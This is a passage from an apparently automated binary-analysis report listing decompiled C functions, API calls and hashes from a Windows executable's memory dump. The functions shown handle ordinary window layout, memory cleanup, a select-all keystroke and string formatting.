                                                                                                                                                                  • Instruction ID: bb54f3dbfe595cb11ae02f9551d523dabe65b88657fa4b418f7fa82d5da08bd9
                                                                                                                                                                  • Opcode Fuzzy Hash: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                                                                                                                  • Instruction Fuzzy Hash: BF41C172900209EFDB10EBA5C8819AEB3B9EF45304F14847FE545B3292DB78AE41CB59
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004067AC, Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                                                  			E004067AC(char** __edi) {
				void* __esi;
				void* _t9;
				void** _t11;
				char** _t15;
				char** _t24;
				void* _t25;
				char* _t28;
				char* _t29;
				char* _t30;
				char* _t31;
				char** _t33;

				_t24 = __edi;
				 *__edi = "cf@";
				_t9 = E00406746(__edi);
				_t28 = __edi[5];
				if(_t28 != 0) {
					_t9 = E004055D1(_t9, _t28);
					_push(_t28);
					L0040B272();
				}
				_t29 = _t24[4];
				if(_t29 != 0) {
					_t9 = E004055D1(_t9, _t29);
					_push(_t29);
					L0040B272();
				}
				_t30 = _t24[3];
				if(_t30 != 0) {
					_t9 = E004055D1(_t9, _t30);
					_push(_t30);
					L0040B272();
				}
				_t31 = _t24[2];
				if(_t31 != 0) {
					E004055D1(_t9, _t31);
					_push(_t31);
					L0040B272();
				}
				_t15 = _t24;
				_pop(_t32);
				_push(_t24);
				_t33 = _t15;
				_t25 = 0;
				if(_t33[1] > 0 && _t33[0xd] > 0) {
					do {
						 *((intOrPtr*)( *((intOrPtr*)(E0040664E(_t33, _t25))) + 0xc))();
						_t25 = _t25 + 1;
					} while (_t25 < _t33[0xd]);
				}
				_t11 =  *( *_t33)();
				free( *_t11);
				return _t11;
			}














                                                                                                                                                                  0x004067ac
                                                                                                                                                                  0x004067af
                                                                                                                                                                  0x004067b5
                                                                                                                                                                  0x004067ba
                                                                                                                                                                  0x004067bf
                                                                                                                                                                  0x004067c1
                                                                                                                                                                  0x004067c6
                                                                                                                                                                  0x004067c7
                                                                                                                                                                  0x004067cc
                                                                                                                                                                  0x004067cd
                                                                                                                                                                  0x004067d2
                                                                                                                                                                  0x004067d4
                                                                                                                                                                  0x004067d9
                                                                                                                                                                  0x004067da
                                                                                                                                                                  0x004067df
                                                                                                                                                                  0x004067e0
                                                                                                                                                                  0x004067e5
                                                                                                                                                                  0x004067e7
                                                                                                                                                                  0x004067ec
                                                                                                                                                                  0x004067ed
                                                                                                                                                                  0x004067f2
                                                                                                                                                                  0x004067f3
                                                                                                                                                                  0x004067f8
                                                                                                                                                                  0x004067fa
                                                                                                                                                                  0x004067ff
                                                                                                                                                                  0x00406800
                                                                                                                                                                  0x00406805
                                                                                                                                                                  0x00406806
                                                                                                                                                                  0x00406808
                                                                                                                                                                  0x0040680f
                                                                                                                                                                  0x00406810
                                                                                                                                                                  0x00406812
                                                                                                                                                                  0x00406817
                                                                                                                                                                  0x0040681e
                                                                                                                                                                  0x00406828
                                                                                                                                                                  0x0040682b
                                                                                                                                                                  0x0040682c
                                                                                                                                                                  0x0040681e
                                                                                                                                                                  0x00406835
                                                                                                                                                                  0x00406839
                                                                                                                                                                  0x00406841

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                                                                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                                                                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                                                                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                                                                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004067C7
                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004067DA
                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004067ED
                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00406800
                                                                                                                                                                  • free.MSVCRT(00000000), ref: 00406839
                                                                                                                                                                    • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ??3@$free
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2241099983-0
                                                                                                                                                                  • Opcode ID: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                                                                                                                  • Instruction ID: 35b4881f8254e3ed5d778deec4dde62c4732b660dc94e1daad4ca6c431b67ac1
                                                                                                                                                                  • Opcode Fuzzy Hash: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                                                                                                                  • Instruction Fuzzy Hash: 4E010233902D209BCA217B2A950541FB395FE82B24316807FE802772C5CF38AC618AED
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00405CF8, Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00405CF8(void* __esi, struct HWND__* _a4, signed int _a8) {
				intOrPtr _v12;
				struct tagPOINT _v20;
				struct tagRECT _v36;
				int _t27;
				struct HWND__* _t30;
				struct HWND__* _t32;

				_t30 = _a4;
				if((_a8 & 0x00000001) != 0) {
					_t32 = GetParent(_t30);
					GetWindowRect(_t30,  &_v20);
					GetClientRect(_t32,  &_v36);
					MapWindowPoints(0, _t32,  &_v20, 2);
					_t27 = _v36.right - _v12 - _v36.left;
					_v20.x = _t27;
					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
				}
				if((_a8 & 0x00000002) != 0) {
					E00404FBB(_t30);
				}
				return 1;
			}









                                                                                                                                                                  0x00405d03
                                                                                                                                                                  0x00405d06
                                                                                                                                                                  0x00405d10
                                                                                                                                                                  0x00405d17
                                                                                                                                                                  0x00405d22
                                                                                                                                                                  0x00405d32
                                                                                                                                                                  0x00405d40
                                                                                                                                                                  0x00405d48
                                                                                                                                                                  0x00405d4e
                                                                                                                                                                  0x00405d54
                                                                                                                                                                  0x00405d59
                                                                                                                                                                  0x00405d5c
                                                                                                                                                                  0x00405d61
                                                                                                                                                                  0x00405d67

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetParent.USER32(?), ref: 00405D0A
                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00405D17
                                                                                                                                                                  • GetClientRect.USER32 ref: 00405D22
                                                                                                                                                                  • MapWindowPoints.USER32 ref: 00405D32
                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00405D4E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4247780290-0
                                                                                                                                                                  • Opcode ID: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                                                                                                                  • Instruction ID: c328b93d85e4c90ccc2b92edbac8192aeb41fc184e748709fb0c9a3f9f2b3a5a
                                                                                                                                                                  • Opcode Fuzzy Hash: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                                                                                                                  • Instruction Fuzzy Hash: 41012932801029BBDB119BA59D8DEFFBFBCEF46750F04822AF901A2151D73895028BA5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004083DC, Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                                                  			E004083DC(void* __eax, int __ebx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				void* _t20;
				void* _t21;
				signed int _t28;
				void* _t32;
				void* _t34;

				_t20 = __eax;
				_v12 = _v12 & 0x00000000;
				_push(__ebx);
				_t28 = __eax - 1;
				L0040B26C();
				_v16 = __eax;
				if(_t28 > 0) {
					_t21 = _a4;
					_v8 = __ebx;
					_v8 =  ~_v8;
					_t32 = _t28 * __ebx + _t21;
					_a4 = _t21;
					do {
						memcpy(_v16, _a4, __ebx);
						memcpy(_a4, _t32, __ebx);
						_t20 = memcpy(_t32, _v16, __ebx);
						_a4 = _a4 + __ebx;
						_t32 = _t32 + _v8;
						_t34 = _t34 + 0x24;
						_v12 = _v12 + 1;
						_t28 = _t28 - 1;
					} while (_t28 > _v12);
				}
				_push(_v16);
				L0040B272();
				return _t20;
			}











                                                                                                                                                                  0x004083dc
                                                                                                                                                                  0x004083e2
                                                                                                                                                                  0x004083e9
                                                                                                                                                                  0x004083ea
                                                                                                                                                                  0x004083eb
                                                                                                                                                                  0x004083f3
                                                                                                                                                                  0x004083f6
                                                                                                                                                                  0x004083f8
                                                                                                                                                                  0x00408401
                                                                                                                                                                  0x00408404
                                                                                                                                                                  0x00408407
                                                                                                                                                                  0x00408409
                                                                                                                                                                  0x0040840c
                                                                                                                                                                  0x00408413
                                                                                                                                                                  0x0040841d
                                                                                                                                                                  0x00408427
                                                                                                                                                                  0x0040842c
                                                                                                                                                                  0x0040842f
                                                                                                                                                                  0x00408432
                                                                                                                                                                  0x00408435
                                                                                                                                                                  0x00408438
                                                                                                                                                                  0x00408439
                                                                                                                                                                  0x0040843e
                                                                                                                                                                  0x0040843f
                                                                                                                                                                  0x00408442
                                                                                                                                                                  0x0040844a

                                                                                                                                                                  APIs
                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 004083EB
                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,00000000,?,?), ref: 00408413
                                                                                                                                                                  • memcpy.MSVCRT(00000000,?,00000000,?,00000000,00000000,?,?), ref: 0040841D
                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000000,00000000,?,00000000,?,00000000,00000000,?,?), ref: 00408427
                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00408442
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpy$??2@??3@
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1252195045-0
                                                                                                                                                                  • Opcode ID: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                                                                                                                  • Instruction ID: 529a25ebd12540bef40c4bbbf5f662c822a20cdbd1f214c79cf6c3b5efc5d95d
                                                                                                                                                                  • Opcode Fuzzy Hash: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                                                                                                                  • Instruction Fuzzy Hash: 61017176C0410CBBCF006F99D8859DEBBB8EF40394F1080BEF80476161D7355E519B98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00406746, Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 76%
                                                                                                                                                                  			E00406746(void* __esi) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t18;
				void* _t19;

				_t19 = __esi;
				_t9 =  *((intOrPtr*)(__esi + 0x30));
				if(_t9 != 0) {
					_push(_t9);
					L0040B272();
				}
				_t10 =  *((intOrPtr*)(_t19 + 0x40));
				if(_t10 != 0) {
					_push(_t10);
					L0040B272();
				}
				_t11 =  *((intOrPtr*)(_t19 + 0x2d4));
				if(_t11 != 0) {
					_push(_t11);
					L0040B272();
				}
				_t18 =  *((intOrPtr*)(_t19 + 0x2c0));
				if(_t18 != 0) {
					_t11 =  *_t18;
					if(_t11 != 0) {
						_push(_t11);
						L0040B272();
						 *_t18 = 0;
					}
					_push(_t18);
					L0040B272();
				}
				 *((intOrPtr*)(_t19 + 0x2c0)) = 0;
				 *((intOrPtr*)(_t19 + 0x30)) = 0;
				 *((intOrPtr*)(_t19 + 0x40)) = 0;
				 *((intOrPtr*)(_t19 + 0x2d4)) = 0;
				return _t11;
			}








                                                                                                                                                                  0x00406746
                                                                                                                                                                  0x00406746
                                                                                                                                                                  0x0040674f
                                                                                                                                                                  0x00406751
                                                                                                                                                                  0x00406752
                                                                                                                                                                  0x00406757
                                                                                                                                                                  0x00406758
                                                                                                                                                                  0x0040675d
                                                                                                                                                                  0x0040675f
                                                                                                                                                                  0x00406760
                                                                                                                                                                  0x00406765
                                                                                                                                                                  0x00406766
                                                                                                                                                                  0x0040676e
                                                                                                                                                                  0x00406770
                                                                                                                                                                  0x00406771
                                                                                                                                                                  0x00406776
                                                                                                                                                                  0x00406777
                                                                                                                                                                  0x0040677f
                                                                                                                                                                  0x00406781
                                                                                                                                                                  0x00406785
                                                                                                                                                                  0x00406787
                                                                                                                                                                  0x00406788
                                                                                                                                                                  0x0040678e
                                                                                                                                                                  0x0040678e
                                                                                                                                                                  0x00406790
                                                                                                                                                                  0x00406791
                                                                                                                                                                  0x00406796
                                                                                                                                                                  0x00406798
                                                                                                                                                                  0x0040679e
                                                                                                                                                                  0x004067a1
                                                                                                                                                                  0x004067a4
                                                                                                                                                                  0x004067ab

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ??3@
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 613200358-0
                                                                                                                                                                  • Opcode ID: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                                                                                                                  • Instruction ID: 2146815d826ad61a6329a34e2799f13692f9223f7a0132405705f454cb51ab02
                                                                                                                                                                  • Opcode Fuzzy Hash: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                                                                                                                  • Instruction Fuzzy Hash: E1F0ECB2504701DBDB24AE7D99C881FA7E9BB05318B65087FF14AE3680C738B850461C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040ABA5, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                                                  			E0040ABA5(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr _v12;
				void* __ebx;
				intOrPtr _t37;
				intOrPtr _t42;
				RECT* _t44;

				_push(__ecx);
				_push(__ecx);
				_t42 = __ecx;
				_v12 = __ecx;
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t37 = _a12;
							 *((intOrPtr*)(_t37 + 0x18)) = 0xc8;
							 *((intOrPtr*)(_t37 + 0x1c)) = 0xc8;
						}
					} else {
						E00402EC8(__ecx + 0x378);
					}
				} else {
					_v8 = BeginDeferWindowPos(3);
					_t44 = _t42 + 0x378;
					E00402E22(_t44, _t21, 0x65, 0, 0, 1, 1);
					E00402E22(_t44, _v8, 1, 1, 1, 0, 0);
					E00402E22(_t44, _v8, 2, 1, 1, 0, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t44 + 0x10), _t44, 1);
					_t42 = _v12;
				}
				return E00402CED(_t42, _a4, _a8, _a12);
			}









                                                                                                                                                                  0x0040aba8
                                                                                                                                                                  0x0040aba9
                                                                                                                                                                  0x0040abb0
                                                                                                                                                                  0x0040abb2
                                                                                                                                                                  0x0040abb5
                                                                                                                                                                  0x0040ac19
                                                                                                                                                                  0x0040ac2c
                                                                                                                                                                  0x0040ac2e
                                                                                                                                                                  0x0040ac36
                                                                                                                                                                  0x0040ac39
                                                                                                                                                                  0x0040ac39
                                                                                                                                                                  0x0040ac1b
                                                                                                                                                                  0x0040ac21
                                                                                                                                                                  0x0040ac21
                                                                                                                                                                  0x0040abb7
                                                                                                                                                                  0x0040abcb
                                                                                                                                                                  0x0040abce
                                                                                                                                                                  0x0040abd7
                                                                                                                                                                  0x0040abe6
                                                                                                                                                                  0x0040abf6
                                                                                                                                                                  0x0040abfe
                                                                                                                                                                  0x0040ac09
                                                                                                                                                                  0x0040ac0f
                                                                                                                                                                  0x0040ac12
                                                                                                                                                                  0x0040ac4f

                                                                                                                                                                  APIs
                                                                                                                                                                  • BeginDeferWindowPos.USER32 ref: 0040ABBA
                                                                                                                                                                    • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                                                                                                                    • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                                                                                                                    • Part of subcall function 00402E22: DeferWindowPos.USER32 ref: 00402EB4
                                                                                                                                                                  • EndDeferWindowPos.USER32(?), ref: 0040ABFE
                                                                                                                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 0040AC09
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                                                                                                  • String ID: $
                                                                                                                                                                  • API String ID: 2498372239-3993045852
                                                                                                                                                                  • Opcode ID: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                                                                                                                  • Instruction ID: c4de0c57513a3fc8bb763215dcca23c205eee760976c5819edcd99f4220bed98
                                                                                                                                                                  • Opcode Fuzzy Hash: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                                                                                                                  • Instruction Fuzzy Hash: 9A11ACB1544208FFEB229F51CD88DAF7A7CEB85788F10403EF8057A280C6758E52DBA5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00403A73, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54keyboardwindowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00403A73(void* __esi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t14;

				if(_a8 == 0x100 && _a12 == 0x41) {
					GetKeyState(0xa2);
					if(E00403A60(0xa2) != 0 || E00403A60(0xa3) != 0) {
						if(E00403A60(0xa0) == 0 && E00403A60(0xa1) == 0 && E00403A60(0xa4) == 0) {
							_t14 = E00403A60(0xa5);
							if(_t14 == 0) {
								SendMessageW(_a4, 0xb1, _t14, 0xffffffff);
							}
						}
					}
				}
				return CallWindowProcW( *0x40f2f0, _a4, _a8, _a12, _a16);
			}




                                                                                                                                                                  0x00403a7d
                                                                                                                                                                  0x00403a8c
                                                                                                                                                                  0x00403a9c
                                                                                                                                                                  0x00403aba
                                                                                                                                                                  0x00403adf
                                                                                                                                                                  0x00403ae7
                                                                                                                                                                  0x00403af4
                                                                                                                                                                  0x00403af4
                                                                                                                                                                  0x00403ae7
                                                                                                                                                                  0x00403aba
                                                                                                                                                                  0x00403a9c
                                                                                                                                                                  0x00403b13

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetKeyState.USER32 ref: 00403A8C
                                                                                                                                                                    • Part of subcall function 00403A60: GetKeyState.USER32 ref: 00403A64
                                                                                                                                                                  • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00403AF4
                                                                                                                                                                  • CallWindowProcW.USER32(?,00000100,?,?), ref: 00403B0C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: State$CallMessageProcSendWindow
                                                                                                                                                                  • String ID: A
                                                                                                                                                                  • API String ID: 3924021322-3554254475
                                                                                                                                                                  • Opcode ID: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                                                                                                                  • Instruction ID: 3f4bab65c8f2f559ff61c6136e8e970ba349fdfc906a465d58382778652fa82c
                                                                                                                                                                  • Opcode Fuzzy Hash: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                                                                                                                  • Instruction Fuzzy Hash: AC01483130430AAEFF11DFE59D02ADA3A5CAF15327F114036FA96B81D1DBB887506E59
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004034F0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                                                  			E004034F0(void* __ecx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v20;
				char _v1072;
				void _v3672;
				char _v4496;
				intOrPtr _v4556;
				char _v4560;
				void* __edi;
				void* __esi;
				intOrPtr* _t41;
				void* _t45;

				_t45 = __eflags;
				E0040B550(0x11cc, __ecx);
				E00402923( &_v4560);
				_v4560 = 0x40db44;
				E00406670( &_v4496, _t45);
				_v4496 = 0x40dab0;
				memset( &_v3672, 0, 0x10);
				E0040A909( &_v1072);
				_t41 = _a4;
				_v4556 = 0x71;
				if(E00402CD5( &_v4560,  *((intOrPtr*)(_t41 + 0x10))) != 0) {
					L0040B266();
					 *((intOrPtr*)( *_t41 + 4))(1, _v20, _t41 + 0x5b2c, 0xa);
				}
				_v4496 = 0x40dab0;
				_v4560 = 0x40db44;
				E004067AC( &_v4496);
				return E00402940( &_v4560);
			}













                                                                                                                                                                  0x004034f0
                                                                                                                                                                  0x004034f8
                                                                                                                                                                  0x00403506
                                                                                                                                                                  0x00403516
                                                                                                                                                                  0x0040351c
                                                                                                                                                                  0x00403531
                                                                                                                                                                  0x00403537
                                                                                                                                                                  0x00403545
                                                                                                                                                                  0x0040354a
                                                                                                                                                                  0x00403556
                                                                                                                                                                  0x00403567
                                                                                                                                                                  0x00403575
                                                                                                                                                                  0x00403583
                                                                                                                                                                  0x00403583
                                                                                                                                                                  0x00403586
                                                                                                                                                                  0x00403592
                                                                                                                                                                  0x00403598
                                                                                                                                                                  0x004035ac

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00402923: memset.MSVCRT ref: 00402935
                                                                                                                                                                    • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066B9
                                                                                                                                                                    • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066E0
                                                                                                                                                                    • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406701
                                                                                                                                                                    • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406722
                                                                                                                                                                  • memset.MSVCRT ref: 00403537
                                                                                                                                                                  • _ultow.MSVCRT ref: 00403575
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ??2@$memset$_ultow
                                                                                                                                                                  • String ID: cf@$q
                                                                                                                                                                  • API String ID: 3448780718-2693627795
                                                                                                                                                                  • Opcode ID: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                                                                                                                  • Instruction ID: aa1ed1bb2df2d11c17fc3d40a8ec787ac421495c908f782690464d4e039b4fd8
                                                                                                                                                                  • Opcode Fuzzy Hash: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                                                                                                                  • Instruction Fuzzy Hash: 73113079A402186ACB24AB55DC41BCDB7B4AF45304F0084BAEB09771C1D7796E888FD8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00407E24, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 64%
                                                                                                                                                                  			E00407E24(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				signed short _v516;
				void _v1026;
				signed short _v1028;
				void* __esi;
				void* _t17;
				intOrPtr* _t26;
				signed short* _t28;

				_v516 = _v516 & 0x00000000;
				_t26 = __ecx;
				memset( &_v514, 0, 0x1fc);
				_v1028 = _v1028 & 0x00000000;
				memset( &_v1026, 0, 0x1fc);
				_t17 =  *((intOrPtr*)( *_t26 + 0x24))();
				_t28 =  &_v516;
				E00407250(_t28, _t17);
				_push(_t28);
				_push(L"</%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040B1EC();
				return E00407343(_t26, _a4,  &_v1028);
			}











                                                                                                                                                                  0x00407e2d
                                                                                                                                                                  0x00407e46
                                                                                                                                                                  0x00407e48
                                                                                                                                                                  0x00407e4d
                                                                                                                                                                  0x00407e5f
                                                                                                                                                                  0x00407e6b
                                                                                                                                                                  0x00407e6f
                                                                                                                                                                  0x00407e75
                                                                                                                                                                  0x00407e7c
                                                                                                                                                                  0x00407e7d
                                                                                                                                                                  0x00407e88
                                                                                                                                                                  0x00407e8d
                                                                                                                                                                  0x00407e8e
                                                                                                                                                                  0x00407eaa

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 00407E48
                                                                                                                                                                  • memset.MSVCRT ref: 00407E5F
                                                                                                                                                                    • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                                                                                                                    • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                                                                                                                  • _snwprintf.MSVCRT ref: 00407E8E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
